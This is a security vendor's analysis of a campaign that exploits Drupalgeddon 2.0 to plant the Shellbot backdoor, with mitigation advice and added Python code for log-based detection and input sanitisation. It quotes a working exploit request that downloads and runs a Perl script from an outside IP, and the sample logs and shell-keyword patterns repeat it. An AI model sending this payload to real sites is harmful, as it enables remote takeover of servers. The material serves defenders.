IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

Shellbot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

IP address: 31.204.80.133
Suspicious request: /?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 64.15.78.216 /lip;perl;cd /tmp;curl -O 64.15.78.216 /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru

Further examination of these requests revealed additional sources of similar traffic: a number of command-and-control (C&C) servers, hosting servers serving the Perl script that launches the Shellbot malware, and a consistent payload naming pattern. Together, these started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both flaws have been patched, but they persist in the wild because users delay patching and upgrading.

As we continued to look into the attack, we saw that vulnerable websites were scanned for the /user/register and /user/password pages during the installation phase. Attackers tried to brute-force their way in with previously discovered user access details while also attempting to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could compromise the web application, with the possibility of spilling over to the underlying operating system as well.
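To show how the request pattern quoted above and the probing of the /user/register and /user/password routes translate into detection, here is an added example (not code from this article or from IBM) that classifies web-server access-log lines. It flags Drupal Form API render keys such as #post_render inside parameter names, shell tokens inside parameter values, and repeated POSTs to the probed account routes. The log lines are constructed; the source IP, download host and injected command are the ones quoted in the article, percent-encoded the way a web server records them.

```python
"""Detect the Drupalgeddon 2.0 (CVE-2018-7600) request pattern in web-server logs.

Added example, not code from the article or from IBM. SAMPLE_LOG is constructed;
the source IP, drop host and injected command are the ones the article quotes.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Drupal Form API render-array keys. A browser never legitimately submits these
# inside a parameter name, so their presence is the signature of a CVE-2018-7600
# attempt (the article's request carries #type, #markup and #post_render).
RENDER_KEYS = ("#type", "#markup", "#post_render", "#pre_render",
               "#lazy_builder", "#access_callback")

# Routes the article says the campaign probed before dropping the Perl bot.
PROBED_ROUTES = ("/user/register", "/user/password")

# Shell tokens present in the article's injected command, plus a few common ones.
SHELL_RE = re.compile(r"\b(wget|curl|perl|passthru|chmod|rm -rf)\b")

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')


def classify_request(target):
    """Classify one request target (path + query); returns (route, verdict, details)."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes names/values
    q = dict(params).get("q")                                  # Drupal's ?q=path routing
    route = "/" + q.strip("/") if q else parts.path
    render_hits = sorted({rk for name, _ in params for rk in RENDER_KEYS if rk in name})
    shell_hits = sorted({m for _, value in params for m in SHELL_RE.findall(value)})
    if render_hits and shell_hits:
        verdict = "exploit_attempt"   # render key plus a command: the CVE-2018-7600 payload
    elif render_hits:
        verdict = "probe"             # render key alone: a scanner testing for the flaw
    else:
        verdict = "benign"
    return route, verdict, {"render_keys": render_hits, "shell": shell_hits}


def parse_log_line(line):
    """Parse one access-log line into an event dict, or None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    route, verdict, details = classify_request(m["target"])
    return {"ip": m["ip"], "method": m["method"], "route": route,
            "status": int(m["status"]), "verdict": verdict, **details}


def scan_log(lines, post_threshold=3):
    """Summarise per source IP: the worst verdict seen and whether the source
    repeatedly POSTed to the probed account routes (a credential-guessing signal)."""
    severity = {"benign": 0, "probe": 1, "exploit_attempt": 2}
    worst, probed_posts = {}, Counter()
    for line in lines:
        ev = parse_log_line(line)
        if ev is None:
            continue
        if severity[ev["verdict"]] >= severity[worst.get(ev["ip"], "benign")]:
            worst[ev["ip"]] = ev["verdict"]
        if ev["method"] == "POST" and ev["route"] in PROBED_ROUTES:
            probed_posts[ev["ip"]] += 1
    return {ip: {"verdict": v, "probed_route_posts": probed_posts[ip],
                 "repeated_form_posts": probed_posts[ip] >= post_threshold}
            for ip, v in worst.items()}


# Constructed log lines. The first is the article's request, percent-encoded the
# way a web server records it (';' -> %3B, '#' -> %23, '[' -> %5B, ']' -> %5D).
SAMPLE_LOG = [
    '31.204.80.133 - - [20/Oct/2018:03:14:07 +0000] "POST /?q=user/password'
    '&name%5B%23type%5D=markup&name%5B%23markup%5D=cd%20/tmp%3Bwget%2064.15.78.216/lip'
    '%3Bperl%3Bcd%20/tmp%3Bcurl%20-O%2064.15.78.216/lip%3Bperl%20lip%3Brm%20-rf%20lip*'
    '&name%5B%23post_render%5D%5B%5D=passthru HTTP/1.1" 200 512',
    # scanner checking for the flaw without sending a command yet
    '203.0.113.9 - - [20/Oct/2018:03:15:22 +0000] "GET /?q=user/register&mail%5B%23type%5D=markup HTTP/1.1" 200 4096',
    # ordinary visitor opening the password-reset form
    '198.51.100.4 - - [20/Oct/2018:03:16:01 +0000] "GET /user/password HTTP/1.1" 200 4096',
    # the same scanner hammering the password-reset form
    '203.0.113.9 - - [20/Oct/2018:03:16:40 +0000] "POST /user/password HTTP/1.1" 200 4096',
    '203.0.113.9 - - [20/Oct/2018:03:16:41 +0000] "POST /user/password HTTP/1.1" 200 4096',
    '203.0.113.9 - - [20/Oct/2018:03:16:42 +0000] "POST /user/password HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, summary in scan_log(SAMPLE_LOG).items():
        print(ip, summary)
```

The render-key check is the high-confidence signal: a parameter name containing a Form API key is not something a browser produces, so a single hit is worth an alert even when no command is attached. The shell-token and repeated-POST checks are supporting context for triage rather than standalone detections.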

Shellbot Resurfaces

Shellbot itself is old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command-line shells, perform denial-of-service attacks, run tasks and processes, download additional files on the attacker’s command and change the endpoint’s settings, to name a few capabilities.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, at the height of exploitation of the Apache Struts vulnerability (CVE-2017-5638), Shellbot was packaged as the C&C component of the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Serve sites over current protocols such as HTTPS, and upgrade wherever older protocols are still in use.
  • Update CMSs to the most recent version and use all available patches.
  • Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
  • Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.

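The server-side validation tip above is where the Drupal core fix for CVE-2018-7600 acted: it strips any request parameter whose name begins with "#" before the Form API can interpret it as a render-array instruction. The following added example (not Drupal's code; a Python reconstruction of that idea) expands PHP-style bracket names such as name[#type] into the nested structure PHP would build for $_GET and $_POST, removes every "#"-prefixed key at any depth and reports what was removed so the rejection can be logged. The first query string is the one from the article's request, percent-encoded; the second, benign query is constructed.

```python
"""Strip Form API render-control keys from request input before the framework sees them.

Added example reconstructing the idea behind Drupal's core fix for CVE-2018-7600
(not Drupal's own code): any parameter whose name starts with '#' is dropped, at
any nesting depth, and the rejection is recorded so it can be logged or alerted on.
"""
import re
from urllib.parse import parse_qsl

BRACKET_RE = re.compile(r"\[([^\]]*)\]")


def expand_php_keys(pairs):
    """Expand PHP-style names such as name[#type] or field[0][value] into the nested
    dict PHP builds for $_GET/$_POST; '[]' appends under the next numeric index."""
    tree = {}
    for name, value in pairs:
        head, _, rest = name.partition("[")
        segments = [head] + (BRACKET_RE.findall("[" + rest) if rest else [])
        node = tree
        for i, seg in enumerate(segments):
            if seg == "":
                seg = str(len(node))
            if i == len(segments) - 1:
                node[seg] = value
            else:
                node = node.setdefault(seg, {})
                if not isinstance(node, dict):  # scalar/array conflict: keep the first value
                    break
    return tree


def strip_render_keys(node, path="", removed=None):
    """Return (clean_copy, removed_paths): every key beginning with '#' is removed,
    at any depth, and its bracketed path (e.g. name[#post_render]) is recorded."""
    if removed is None:
        removed = []
    if not isinstance(node, dict):
        return node, removed
    clean = {}
    for key, value in node.items():
        here = f"{path}[{key}]" if path else key
        if key.startswith("#"):
            removed.append(here)
            continue
        clean[key], _ = strip_render_keys(value, here, removed)
    return clean, removed


def sanitize_query(query_string):
    """Parse a raw query string (or urlencoded body), expand it as PHP would, then sanitise."""
    tree = expand_php_keys(parse_qsl(query_string, keep_blank_values=True))
    return strip_render_keys(tree)


# The query string of the request quoted in the article, percent-encoded.
ARTICLE_QUERY = (
    "q=user/password&name%5B%23type%5D=markup"
    "&name%5B%23markup%5D=cd%20/tmp%3Bwget%2064.15.78.216/lip%3Bperl%3Bcd%20/tmp"
    "%3Bcurl%20-O%2064.15.78.216/lip%3Bperl%20lip%3Brm%20-rf%20lip*"
    "&name%5B%23post_render%5D%5B%5D=passthru"
)
# A constructed, legitimate password-reset submission carrying a nested field.
BENIGN_QUERY = "q=user/password&name=alice&field%5B0%5D%5Bvalue%5D=hi"

if __name__ == "__main__":
    for label, qs in (("article", ARTICLE_QUERY), ("benign", BENIGN_QUERY)):
        clean, removed = sanitize_query(qs)
        print(label, "kept:", clean, "removed:", removed)
```

Stripping rather than rejecting the whole request keeps legitimate nested fields working, and the returned list of removed paths is the part worth wiring into logging: a non-empty list on a production site is the same signal the log-based detection looks for, caught before the framework processes the input.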
Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.
